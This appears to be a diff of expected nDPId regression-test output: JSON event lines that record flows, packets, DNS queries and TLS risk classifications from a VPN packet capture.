00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"}
01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"}
01180{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="}
00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -167,42 +167,42 @@
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="}
00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="}
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
